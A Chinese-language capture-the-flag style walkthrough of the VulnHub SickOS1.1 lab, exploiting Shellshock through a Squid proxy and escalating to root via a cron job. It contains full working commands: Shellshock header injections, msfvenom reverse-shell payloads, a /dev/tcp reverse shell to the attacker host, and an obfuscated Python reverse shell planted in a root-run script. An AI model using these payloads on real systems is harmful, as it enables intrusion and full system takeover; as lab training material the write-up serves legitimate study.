靶机精讲之SickOS1.1,vulnhub靶机,需要配置代理,穿越Squid实现对CMS渗透,shellshock是本机的重要利用路径,本视频详细分析了shellshock的原理,展示了利用过程,希望借此靶机完全吃透shellshock这种利用。此为本机打法二。
------《红队笔记》
在第一种解法中得知靶机有三个端口:22,3128,8080。
3128 端口的代理服务器可以被攻击者使用。
nikto 漏洞扫描
sudo nikto -h 10.10.10.19 -useproxy http://10.10.10.19:3128
Nikto 工具是一款常用的 Web 应用程序扫描工具,能够探测服务器漏洞,检测 SQL 注入、XSS 、文件包含和命令注入等 Web 安全问题。
-h (host) :指定目标主机的 IP 地址。
-useproxy:使用 HTTP 代理服务器,将所有的请求和响应通过代理服务器转发。
在扫描结果中,可以发现爆出了一个 shellshock 漏洞:
shellshock 漏洞的利用
关于 shellshock 漏洞
Shellshock ,又称 Bashdoor ,是在 Unix 中广泛使用的 Bash shell 中的一个安全漏洞,首次于2014年9月24日公开。
curl 漏洞测试
sudo curl -v --proxy http://10.10.10.19:3128 http://10.10.10.19/cgi-bin/status -H "Referer:() { test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id;exit"
-
curl
: 使用 curl 工具发起 HTTP 请求 -
-v
: 详细输出请求过程的信息 -
--proxy http://10.10.10.19:3128
: 配置代理服务器地址和端口号 -
http://10.10.10.19/cgi-bin/status
: 请求的目标 URL -
-H "Referer:() { test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id;exit"
: 设置请求头,其中 “ Referer ” 字段中注入了一个恶意的环境变量,用于执行在 Bash shell 环境下的 id 命令。 -
-H
: 表示设置 HTTP 请求的头部信息 -
() { test;}
: 这是一个恶意的定义函数的语句,意思是" 定义一个函数 test " -
echo 'Content-Type: text/plain';
: 表示输出 “ Content-Type: text/plain ” ,作为 HTTP 响应的头部信息的一部分 -
echo; echo;
: 表示输出两个空行,也是为了协议要求的 HTTP 响应头和正文之间需要空一行的要求 -
/usr/bin/id
: 表示执行一个系统命令,这里是查看当前用户身份的 id 命令 -
exit
: 表示退出 Bash 解释器。由于该环境变量采用 Bash 语法,Bash 在执行完 id 命令后就会解析到该 exit 命令,随即会退出 Bash 解释器,终止命令的执行。
最终效果是,攻击者的指令将被注入到目标服务器的 HTTP 请求头中,服务器在解析请求头时会执行其中的恶意函数,然后执行 echo 命令输出 HTTP 响应头,并执行 id 命令查看当前用户身份,最后退出 Shell。
在结果中成功返回用户 id 及属组:
说明漏洞测试成功,这个 shellshock 漏洞可以被利用。
渗透测试
msfvenom 生成 payload
顺带一提,如果没有安装 metasploit-framework 的话,在使用这条命令之前需要先安装一下:
apt install metasploit-framework
sudo msfvenom -p cmd/unix/reverse_bash lhost=10.10.10.3 lport=443 -f raw
这是一条用msfvenom
工具生成 Metasploit 负载的命令。以下是该命令的详细解释:
sudo
指令被用来提升权限,通常需要系统管理员权限才能运行msfvenom
。msfvenom
是 Metasploit Framework 中的一个 Payload 生成工具,用于生成指定漏洞利用的 Payloads 。本例中使用msfvenom
命令生成一个负载 (payload
), 这个负载是一个用于反向连接的 Bash shell(命令行解释器)。-p cmd/unix/reverse_bash
指定了使用反向 Bash shell 作为负载类型。这个负载将会被包含在漏洞利用程序中,在利用某些漏洞时被远程执行。lhost=10.10.10.3
用来指定监听的本地 IP 地址,即攻击者的 IP 地址。在反向连接时,被攻击者机器将会连接到这个 IP。lport=443
指定监听的本地端口号,即要监听的 TCP 端口号。这个端口是指定的反向连接的端口号。正常情况下,443 端口是 HTTPS 协议的默认端口,用途是加密 Web 传输的内容。-f raw
用于生成输出的格式,指定文件输出格式为“原始数据”(raw),即没有经过编码和压缩的二进制数据,常常会被作为负载文件使用。
综上所述,这条命令的作用是生成一个反向连接的 Bash shell 的 Metasploit 负载,该负载可以被集成在攻击 Veil 的生成攻击向量的过程中使用,作为渗透测试实验中利用漏洞执行代码的一种手段。
所生成的反弹 shell 的语句是:
bash -c '0<&171-;exec 171<>/dev/tcp/10.10.10.3/443;sh <&171 >&171 2>&171'
这条命令的目的是通过与远程主机建立 TCP 连接,将本地的标准输入、输出和错误输出都重定向到该 TCP 连接上。这样可以实现远程控制该主机的功能。
值得注意的是,这里的 sh 最好使用绝对路径 /bin/sh 。
反弹 shell
开启监听:
sudo nc -lvnp 443
发送攻击语句:
sudo curl -v --proxy http://10.10.10.19:3128 http://10.10.10.19/cgi-bin/status -H "Referer:() { test;}; bash -c '0<&171-;exec 171<>/dev/tcp/10.10.10.3/443;/bin/sh <&171 >&171 2>&171'"
成功拿到 shell 。
但是这个 shell 的交互性并不好,输入命令时前面没有命令提示符。
提高交互性
通过 dpkg -l 查看系统安装了哪些软件,发现安装了 python 。
为了提高交互性,我们输入以下命令:
python -c "import pty;pty.spawn('/bin/bash')"
就可以有命令提示符出来了。
这条命令使用了 Python 的pty
模块,通过pty.spawn()
方法可以创建一个终端窗口,并且将其连接到一个指定的命令中。在这个指令中,该命令是/bin/bash
,也就是开启一个新的 Bash 终端。
crontab 自动任务
进入网站的目录下:cd /var/www
。
查看 connect.py 文件。
frequently 频繁的,联想到自动任务。
crontab 是 Linux 上一个跟自动任务有关的命令,其配置文件在 /etc/cron* ,即 /etc/ 目录下以 cron 开头的各种文件。
在/etc目录下有一个cron.d文件夹,这个就是系统任务调度的配置文件。
cd /etc
ls -liah cron*
-l
: 参数,显示长格式列表-i
: 参数,显示inode编号-a
: 参数,显示所有文件,包括隐藏文件-h
: 参数,人性化地显示文件大小
最终发现 /etc/cron.d/automate 文件里面包含了自动任务的相关信息:
# /etc/cron.d/automate 文件内容
* * * * * root /usr/bin/python /var/www/connect.py
意思是每分钟以 root 权限调用 /usr/bin/python 程序执行 /var/www/connect.py 文件。
那么只需要在 /var/www/connect.py 中插入攻击语句就可以了。
再次使用 msfvenom 生成 payload
要生成一个可以被 Python 执行的反弹 shell 的语句,所以这次的命令有点不一样:
sudo msfvenom -p cmd/unix/reverse_python Lhost=10.10.10.3 lport=444 -f raw
输出结果:
python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqNkEELwjAMhf9K6akFqdvcTXoYMkFEBbf7cLWy4WzK0v1/qS1IbwuF8JIv70HHj4XZEQT11o742pBQuPR2BqURkzH85J4MgE7SPBPh7WgYezdZlmVQKIOxCI1FVR2707Vu07iwam6Hc9e097q68OghFBijlWPMZyZHPo1HDlA8F1swFK9x0gYYT9BsHZavw4qIWfn/JqEe08Toth/NFgfKv51ZWcQ=')[0])))"
但是我们只取双引号里面的即可:
exec(import(‘zlib’).decompress(import(‘base64’).b64decode(import(‘codecs’).getencoder(‘utf-8’)(‘eNqNkEELwjAMhf9K6akFqdvcTXoYMkFEBbf7cLWy4WzK0v1/qS1IbwuF8JIv70HHj4XZEQT11o742pBQuPR2BqURkzH85J4MgE7SPBPh7WgYezdZlmVQKIOxCI1FVR2707Vu07iwam6Hc9e097q68OghFBijlWPMZyZHPo1HDlA8F1swFK9x0gYYT9BsHZavw4qIWfn/JqEe08Toth/NFgfKv51ZWcQ=’)[0])))
将 payload 插入到 /var/www/connect.py 文件中,同时 kali 开启 nc 监听。
这样最多等待一分钟,当自动任务执行的时候,shell 就被反弹回来了。